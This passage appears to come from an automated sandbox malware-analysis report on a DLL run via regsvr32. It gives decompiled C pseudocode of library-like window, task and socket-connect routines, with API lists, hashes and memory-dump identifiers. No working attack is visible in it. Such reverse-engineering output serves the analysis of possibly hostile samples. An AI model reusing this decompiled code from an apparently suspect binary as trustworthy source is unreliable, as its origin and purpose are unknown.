                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                • String ID:
                                                                                                                • API String ID: 670545878-0
                                                                                                                • Opcode ID: e93b576b2b0a3dd52bb86e228c6313b0d40743579fd091f4fc51be0184015caf
                                                                                                                • Instruction ID: 3ad509a7b5a95862af2034f189a18abb85d4682610d6dade512639eaa9eb3744
                                                                                                                • Opcode Fuzzy Hash: e93b576b2b0a3dd52bb86e228c6313b0d40743579fd091f4fc51be0184015caf
                                                                                                                • Instruction Fuzzy Hash: 8111A33AA012325BD761DB597D8CB9EB2DDDF75AE1F9A0215ED00E3204EB50DC0046D5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 43%
                                                                                                                			E1002855A(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				short _t19;
                                                                                                                				intOrPtr* _t30;
                                                                                                                				intOrPtr _t37;
                                                                                                                				intOrPtr _t39;
                                                                                                                				void* _t40;
                                                                                                                
                                                                                                                				E1003D24F(E10053C78, __ebx, __edi, __esi);
                                                                                                                				_t39 =  *((intOrPtr*)(_t40 + 8));
                                                                                                                				_t30 = __ecx;
                                                                                                                				 *0x1006efc8(0x18);
                                                                                                                				_t37 = 0;
                                                                                                                				 *((intOrPtr*)(_t40 - 0x24)) = 0;
                                                                                                                				 *((intOrPtr*)(_t40 - 4)) = 0;
                                                                                                                				if(_t39 != 0) {
                                                                                                                					_t19 = E1003BB70(0, _t40 - 0x20, 0, 0x10);
                                                                                                                					 *((short*)(_t40 - 0x20)) = 2;
                                                                                                                					__imp__#11(_t39);
                                                                                                                					 *((intOrPtr*)(_t40 - 0x1c)) = _t19;
                                                                                                                					if(_t19 != 0xffffffff) {
                                                                                                                						L6:
                                                                                                                						__imp__#9( *((intOrPtr*)(_t40 + 0xc)));
                                                                                                                						 *((short*)(_t40 - 0x1e)) = _t19;
                                                                                                                						_t37 =  *((intOrPtr*)( *_t30 + 0x34))(_t40 - 0x20, 0x10);
                                                                                                                					} else {
                                                                                                                						__imp__#52(_t39);
                                                                                                                						if(_t19 == 0) {
                                                                                                                							__imp__#112(0x2726);
                                                                                                                						} else {
                                                                                                                							_t19 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t19 + 0xc))))));
                                                                                                                							 *((intOrPtr*)(_t40 - 0x1c)) = _t19;
                                                                                                                							goto L6;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					E10015160(_t40 - 0x24);
                                                                                                                				} else {
                                                                                                                					E10015160(_t40 - 0x24);
                                                                                                                				}
                                                                                                                				return E1003D2D2(_t30, _t37, _t39);
                                                                                                                			}









                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorH_prolog3_Last_memsetgethostbynamehtonsinet_addr
                                                                                                                • String ID:
                                                                                                                • API String ID: 250079910-0
                                                                                                                • Opcode ID: 67da7948685c6973ebfd6a6a5f8fe7e302c46e150557611234620c0d63483c23
                                                                                                                • Instruction ID: 3d8e11822c02e760ff3703b433370f436c9e02279ebdb974c814a358813cb291
                                                                                                                • Opcode Fuzzy Hash: 67da7948685c6973ebfd6a6a5f8fe7e302c46e150557611234620c0d63483c23
                                                                                                                • Instruction Fuzzy Hash: B3115E389016289FDB01EFA4DC8599EB7B5FF58351F94011AF501EB2A1DB749A44CB10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 38%
                                                                                                                			E1002D92A(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                                                                                                                				struct tagRECT _v20;
                                                                                                                				struct HWND__* _t12;
                                                                                                                				struct HWND__* _t21;
                                                                                                                
                                                                                                                				ClientToScreen(_a4,  &_a8);
                                                                                                                				_push(5);
                                                                                                                				_push(_a4);
                                                                                                                				while(1) {
                                                                                                                					_t12 = GetWindow();
                                                                                                                					_t21 = _t12;
                                                                                                                					if(_t21 == 0) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
                                                                                                                						GetWindowRect(_t21,  &_v20);
                                                                                                                						_push(_a12);
                                                                                                                						if(PtInRect( &_v20, _a8) != 0) {
                                                                                                                							return _t21;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_push(2);
                                                                                                                					_push(_t21);
                                                                                                                				}
                                                                                                                				return _t12;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • ClientToScreen.USER32(?,?), ref: 1002D939
                                                                                                                • GetDlgCtrlID.USER32 ref: 1002D94D
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 1002D95B
                                                                                                                • GetWindowRect.USER32 ref: 1002D96D
                                                                                                                • PtInRect.USER32(?,?,?), ref: 1002D97D
                                                                                                                • GetWindow.USER32(?,00000005), ref: 1002D98A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1315500227-0
                                                                                                                • Opcode ID: 5deeb6f5bb6289f8b2bc9cec112cdb2c2fb39f7e6379f95622d63d18251a0557
                                                                                                                • Instruction ID: 854212cfedab7418c06117252aceac91f7662d20f60d81996717e7a138de9721
                                                                                                                • Opcode Fuzzy Hash: 5deeb6f5bb6289f8b2bc9cec112cdb2c2fb39f7e6379f95622d63d18251a0557
                                                                                                                • Instruction Fuzzy Hash: 6101AD36140529ABEB02AF54AC48EDE7BACEF097A1F804116F901E6064E731DE41DBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E100137D0(void* __edx) {
                                                                                                                				char _v4;
                                                                                                                				char _v12;
                                                                                                                				intOrPtr* _v16;
                                                                                                                				void* __ecx;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t18;
                                                                                                                				signed int _t19;
                                                                                                                				void* _t27;
                                                                                                                				void* _t28;
                                                                                                                				intOrPtr* _t29;
                                                                                                                				void* _t40;
                                                                                                                				intOrPtr* _t42;
                                                                                                                				signed int _t44;
                                                                                                                
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E1005253E);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_push(_t29);
                                                                                                                				_t18 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_t19 = _t18 ^ _t44;
                                                                                                                				_t46 = _t19;
                                                                                                                				_push(_t19);
                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                				_t42 = _t29;
                                                                                                                				_v16 = _t42;
                                                                                                                				 *_t42 = 0x10059534;
                                                                                                                				_v4 = 5;
                                                                                                                				E10021AC4(_t42 + 0x22c, _t40, _t42, _t19);
                                                                                                                				_v4 = 4;
                                                                                                                				E10021AC4(_t42 + 0x1d8, _t40, _t42, _t19);
                                                                                                                				_v4 = 3;
                                                                                                                				E10021AC4(_t42 + 0x184, _t40, _t42, _t46);
                                                                                                                				_v4 = 2;
                                                                                                                				E10021AC4(_t42 + 0x130, _t40, _t42, _t46);
                                                                                                                				_v4 = 1;
                                                                                                                				E10021AC4(_t42 + 0xdc, _t40, _t42, _t46);
                                                                                                                				_v4 = 0;
                                                                                                                				E10021AC4(_t42 + 0x88, _t40, _t42, _t46);
                                                                                                                				_v4 = 0xffffffff;
                                                                                                                				_t27 = E1002BDE8(_t28, _t42, __edx, _t40, _t42, _t46);
                                                                                                                				 *[fs:0x0] = _v12;
                                                                                                                				return _t27;
                                                                                                                			}

















                                                                                                                APIs
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1001380C
                                                                                                                  • Part of subcall function 10021AC4: __EH_prolog3.LIBCMT ref: 10021ACB
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1001381C
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1001382C
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1001383C
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1001384C
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1001385C
                                                                                                                  • Part of subcall function 1002BDE8: __EH_prolog3.LIBCMT ref: 1002BDEF
                                                                                                                  • Part of subcall function 1002BDE8: GlobalFree.KERNEL32(?), ref: 1002BE1E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Task_impl$H_prolog3$FreeGlobal
                                                                                                                • String ID:
                                                                                                                • API String ID: 36242457-0
                                                                                                                • Opcode ID: c1ee4041debee2fcbd8d2699e41404807e412528efaa5a475e8330561ac4796d
                                                                                                                • Instruction ID: 61567bc7b6acd54f2e0f60cfcb75ebd6f32bd7061ffc458e35b541a8c442a89d
                                                                                                                • Opcode Fuzzy Hash: c1ee4041debee2fcbd8d2699e41404807e412528efaa5a475e8330561ac4796d
                                                                                                                • Instruction Fuzzy Hash: B9115E38009B819ED315DF24E5517DABBD4EF69710F88490EE4AA533C1EB74660CCBA3
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E1001C7A2(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				char* _v20;
                                                                                                                				signed int _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v40;
                                                                                                                				intOrPtr _v52;
                                                                                                                				signed int _v56;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr _t122;
                                                                                                                				void* _t128;
                                                                                                                				intOrPtr _t130;
                                                                                                                				signed int _t139;
                                                                                                                				signed int _t144;
                                                                                                                				signed int _t175;
                                                                                                                				signed int _t177;
                                                                                                                				signed int _t179;
                                                                                                                				signed int _t181;
                                                                                                                				signed int _t183;
                                                                                                                				signed int _t187;
                                                                                                                				void* _t190;
                                                                                                                				intOrPtr _t191;
                                                                                                                				signed int _t201;
                                                                                                                
                                                                                                                				_t190 = __ecx;
                                                                                                                				_t122 = E10023187(__ebx, __edi, __esi, __eflags);
                                                                                                                				_v8 = _t122;
                                                                                                                				_t3 =  &_a4;
                                                                                                                				 *_t3 = _a4 &  !( *(_t122 + 0x18));
                                                                                                                				if( *_t3 == 0) {
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                				_push(__ebx);
                                                                                                                				_push(__esi);
                                                                                                                				_push(__edi);
                                                                                                                				_t201 = 0;
                                                                                                                				E1003BB70(0,  &_v56, 0, 0x28);
                                                                                                                				_v52 = DefWindowProcA;
                                                                                                                				_t128 = E10023187(__ebx, 0, 0, __eflags);
                                                                                                                				__eflags = _a4 & 0x00000001;
                                                                                                                				_v40 =  *((intOrPtr*)(_t128 + 8));
                                                                                                                				_t130 =  *0x10070cb0; // 0x10003
                                                                                                                				_t187 = 8;
                                                                                                                				_v32 = _t130;
                                                                                                                				_v16 = _t187;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_push( &_v56);
                                                                                                                					_v56 = 0xb;
                                                                                                                					_v20 = "AfxWnd80s";
                                                                                                                					_t183 = E1001C4BB(_t187, _t190, 0, 0, __eflags);
                                                                                                                					__eflags = _t183;
                                                                                                                					if(_t183 != 0) {
                                                                                                                						_t201 = 1;
                                                                                                                						__eflags = 1;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000020;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v56 = _v56 | 0x0000008b;
                                                                                                                					_push( &_v56);
                                                                                                                					_v20 = "AfxOleControl80s";
                                                                                                                					_t181 = E1001C4BB(_t187, _t190, 0, _t201, __eflags);
                                                                                                                					__eflags = _t181;
                                                                                                                					if(_t181 != 0) {
                                                                                                                						_t201 = _t201 | 0x00000020;
                                                                                                                						__eflags = _t201;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000002;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_push( &_v56);
                                                                                                                					_v56 = 0;
                                                                                                                					_v20 = "AfxControlBar80s";
                                                                                                                					_v28 = 0x10;
                                                                                                                					_t179 = E1001C4BB(_t187, _t190, 0, _t201, __eflags);
                                                                                                                					__eflags = _t179;
                                                                                                                					if(_t179 != 0) {
                                                                                                                						_t201 = _t201 | 0x00000002;
                                                                                                                						__eflags = _t201;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000004;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v56 = _t187;
                                                                                                                					_v28 = 0;
                                                                                                                					_t177 = E1001C761(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
                                                                                                                					__eflags = _t177;
                                                                                                                					if(_t177 != 0) {
                                                                                                                						_t201 = _t201 | 0x00000004;
                                                                                                                						__eflags = _t201;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				__eflags = _a4 & _t187;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v56 = 0xb;
                                                                                                                					_v28 = 6;
                                                                                                                					_t175 = E1001C761(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
                                                                                                                					__eflags = _t175;
                                                                                                                					if(_t175 != 0) {
                                                                                                                						_t201 = _t201 | _t187;
                                                                                                                						__eflags = _t201;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000010;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0xff;
                                                                                                                					_t201 = _t201 | E1001A185(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
                                                                                                                					_t48 =  &_a4;
                                                                                                                					 *_t48 = _a4 & 0xffffc03f;
                                                                                                                					__eflags =  *_t48;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000040;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0x10;
                                                                                                                					_t201 = _t201 | E1001A185(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000080;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 2;
                                                                                                                					_t201 = _t201 | E1001A185(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000100;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = _t187;
                                                                                                                					_t201 = _t201 | E1001A185(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000200;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0x20;
                                                                                                                					_t201 = _t201 | E1001A185(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000400;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 1;
                                                                                                                					_t201 = _t201 | E1001A185(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000800;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0x40;
                                                                                                                					_t201 = _t201 | E1001A185(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00001000;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 4;
                                                                                                                					_t201 = _t201 | E1001A185(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00002000;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0x80;
                                                                                                                					_t201 = _t201 | E1001A185(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00004000;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0x800;
                                                                                                                					_t201 = _t201 | E1001A185(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00008000;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0x400;
                                                                                                                					_t201 = _t201 | E1001A185(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00010000;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0x200;
                                                                                                                					_t201 = _t201 | E1001A185(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00020000;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0x100;
                                                                                                                					_t201 = _t201 | E1001A185(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00040000;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0x8000;
                                                                                                                					_t201 = _t201 | E1001A185(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				_t191 = _v8;
                                                                                                                				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
                                                                                                                				_t139 =  *(_t191 + 0x18);
                                                                                                                				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
                                                                                                                				if((_t139 & 0x00003fc0) == 0x3fc0) {
                                                                                                                					 *(_t191 + 0x18) = _t139 | 0x00000010;
                                                                                                                					_t201 = _t201 | 0x00000010;
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				asm("sbb eax, eax");
                                                                                                                				_t144 =  ~((_t201 & _a4) - _a4) + 1;
                                                                                                                				__eflags = _t144;
                                                                                                                				return _t144;
                                                                                                                			}



























                                                                                                                0x1001c981
                                                                                                                0x1001c981
                                                                                                                0x1001c988
                                                                                                                0x1001c98b
                                                                                                                0x1001c992
                                                                                                                0x1001c99e
                                                                                                                0x1001c99e
                                                                                                                0x1001c99e
                                                                                                                0x1001c9a5
                                                                                                                0x1001c9a8
                                                                                                                0x1001c9af
                                                                                                                0x1001c9bb
                                                                                                                0x1001c9bb
                                                                                                                0x1001c9bb
                                                                                                                0x1001c9c2
                                                                                                                0x1001c9c5
                                                                                                                0x1001c9cc
                                                                                                                0x1001c9d4
                                                                                                                0x1001c9d4
                                                                                                                0x1001c9d4
                                                                                                                0x1001c9db
                                                                                                                0x1001c9de
                                                                                                                0x1001c9e5
                                                                                                                0x1001c9ed
                                                                                                                0x1001c9ed
                                                                                                                0x1001c9ed
                                                                                                                0x1001c9f4
                                                                                                                0x1001c9f7
                                                                                                                0x1001c9fe
                                                                                                                0x1001ca0a
                                                                                                                0x1001ca0a
                                                                                                                0x1001ca0a
                                                                                                                0x1001ca11
                                                                                                                0x1001ca14
                                                                                                                0x1001ca1b
                                                                                                                0x1001ca27
                                                                                                                0x1001ca27
                                                                                                                0x1001ca27
                                                                                                                0x1001ca2e
                                                                                                                0x1001ca31
                                                                                                                0x1001ca38
                                                                                                                0x1001ca40
                                                                                                                0x1001ca40
                                                                                                                0x1001ca40
                                                                                                                0x1001ca42
                                                                                                                0x1001ca45
                                                                                                                0x1001ca48
                                                                                                                0x1001ca54
                                                                                                                0x1001ca56
                                                                                                                0x1001ca5b
                                                                                                                0x1001ca5e
                                                                                                                0x1001ca5e
                                                                                                                0x1001ca5e
                                                                                                                0x1001ca6d
                                                                                                                0x1001ca6f
                                                                                                                0x1001ca6f
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset
                                                                                                                • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                • API String ID: 2102423945-4122032997
                                                                                                                • Opcode ID: f932c1b7ce0b4267c1d03a4bea49264083c1c03100e8a0be53e4328e5d00bddf
                                                                                                                • Instruction ID: 4907c9203e9ab577a0b3114e4bbff15b9c8914df1d523b573cf867939d06b478
                                                                                                                • Opcode Fuzzy Hash: f932c1b7ce0b4267c1d03a4bea49264083c1c03100e8a0be53e4328e5d00bddf
                                                                                                                • Instruction Fuzzy Hash: 6F81ECB5D0025DBEDB41CFA4C585BDEBBE8EF09384F118165E909EA181EB74DA84CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E10011BF0(struct HWND__* __ecx, signed int _a4, char _a8) {
                                                                                                                				intOrPtr _v0;
                                                                                                                				int _v4;
                                                                                                                				char _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				char _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v44;
                                                                                                                				char _v48;
                                                                                                                				intOrPtr _v52;
                                                                                                                				void* _v56;
                                                                                                                				struct HWND__* _v60;
                                                                                                                				intOrPtr _v64;
                                                                                                                				intOrPtr _v76;
                                                                                                                				void* _v80;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t53;
                                                                                                                				signed int _t56;
                                                                                                                				intOrPtr* _t65;
                                                                                                                				void* _t72;
                                                                                                                				intOrPtr* _t79;
                                                                                                                				intOrPtr* _t87;
                                                                                                                				intOrPtr _t89;
                                                                                                                				long _t108;
                                                                                                                				struct HWND__* _t117;
                                                                                                                				int _t119;
                                                                                                                				intOrPtr _t121;
                                                                                                                				void* _t124;
                                                                                                                				signed int _t125;
                                                                                                                
                                                                                                                				_t91 = __ecx;
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E10052178);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_t125 = _t124 - 0x24;
                                                                                                                				_push(_t87);
                                                                                                                				_push(_t122);
                                                                                                                				_push(_t119);
                                                                                                                				_t53 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t53 ^ _t125);
                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                				_t117 = __ecx;
                                                                                                                				_t56 = _a4;
                                                                                                                				if(_t56 < 0 || _t56 >=  *((intOrPtr*)(__ecx + 0x5c))) {
                                                                                                                					L8:
                                                                                                                					E1001729E(_t87, _t91, _t117, _t119, _t133);
                                                                                                                					goto L9;
                                                                                                                				} else {
                                                                                                                					_t121 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x58)) + _t56 * 4));
                                                                                                                					_v32 = _t121;
                                                                                                                					SendMessageA( *(__ecx + 0x90), 0x1009, 0, 0);
                                                                                                                					_t65 = E100119E0(_t117,  &_v48);
                                                                                                                					if( *((intOrPtr*)(_t121 + 0x68)) <= 0) {
                                                                                                                						L11:
                                                                                                                						 *[fs:0x0] = _v16;
                                                                                                                						return _t65;
                                                                                                                					}
                                                                                                                					_t87 =  *((intOrPtr*)(_t121 + 0x60));
                                                                                                                					_t72 = E10001080(_t87,  *((intOrPtr*)(_t87 + 8)) - 0x10);
                                                                                                                					_t125 = _t125 + 4;
                                                                                                                					_a4 = _t72 + 0x10;
                                                                                                                					_v4 = 0;
                                                                                                                					E100119E0(_t117,  &_v28);
                                                                                                                					_t119 = 0;
                                                                                                                					_t122 = _t117 + 0x70;
                                                                                                                					E10026562(_t117 + 0x70, 3, 0, _v0, 0, 0, 0, 0);
                                                                                                                					_v80 =  *((intOrPtr*)(_t117 + 0x6c));
                                                                                                                					_v76 = 0x19;
                                                                                                                					_t91 =  *(_t117 + 0x90);
                                                                                                                					SendMessageA( *(_t117 + 0x90), 0x1031, 0,  &_v80);
                                                                                                                					if(_t87 ==  *((intOrPtr*)(_v64 + 0x64))) {
                                                                                                                						L7:
                                                                                                                						_t133 = _t87;
                                                                                                                						if(_t87 != 0) {
                                                                                                                							L9:
                                                                                                                							_push(_t87 + 8);
                                                                                                                							E10001FF0( &_a4);
                                                                                                                							_t89 = _v0;
                                                                                                                							E10026562(_t122, 3, _t119, _t89, 0, 0, _t119, 0);
                                                                                                                							_t108 =  &_v60;
                                                                                                                							_v56 = 0x19 + _t119 * 0x46;
                                                                                                                							_v60 =  *((intOrPtr*)(_t117 + 0x6c));
                                                                                                                							SendMessageA( *(_t117 + 0x90), 0x1031, _t119, _t108);
                                                                                                                							_t65 = _t89 - 0x10;
                                                                                                                							_v36 = 0xffffffff;
                                                                                                                							asm("lock xadd [ecx], edx");
                                                                                                                							if((_t108 | 0xffffffff) - 1 <= 0) {
                                                                                                                								_t65 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t65)) + 4))))(_t65);
                                                                                                                							}
                                                                                                                							goto L11;
                                                                                                                						}
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					_v44 = 0x19;
                                                                                                                					while(1) {
                                                                                                                						_t79 = _t87;
                                                                                                                						if(_t87 == 0) {
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                						_t87 =  *_t87;
                                                                                                                						_push(_t79 + 8);
                                                                                                                						E10001FF0( &_a8);
                                                                                                                						E10026562(_t122, 3, _t119, _a4, 0, 0, _t119, 0);
                                                                                                                						_v56 =  *((intOrPtr*)(_t117 + 0x6c));
                                                                                                                						_v52 = _v76;
                                                                                                                						SendMessageA( *(_t117 + 0x90), 0x1031, _t119,  &_v56);
                                                                                                                						_t91 = _v60;
                                                                                                                						_v76 = _v76 + 0x46;
                                                                                                                						_t119 = _t119 + 1;
                                                                                                                						if(_t87 !=  *((intOrPtr*)(_v60 + 0x64))) {
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                					goto L8;
                                                                                                                				}
                                                                                                                			}



































                                                                                                                0x10011cdb
                                                                                                                0x10011d48
                                                                                                                0x10011d48
                                                                                                                0x10011d4a
                                                                                                                0x10011d51
                                                                                                                0x10011d54
                                                                                                                0x10011d59
                                                                                                                0x10011d5e
                                                                                                                0x10011d6f
                                                                                                                0x10011d7c
                                                                                                                0x10011d85
                                                                                                                0x10011d95
                                                                                                                0x10011d99
                                                                                                                0x10011d9f
                                                                                                                0x10011da2
                                                                                                                0x10011db0
                                                                                                                0x10011db7
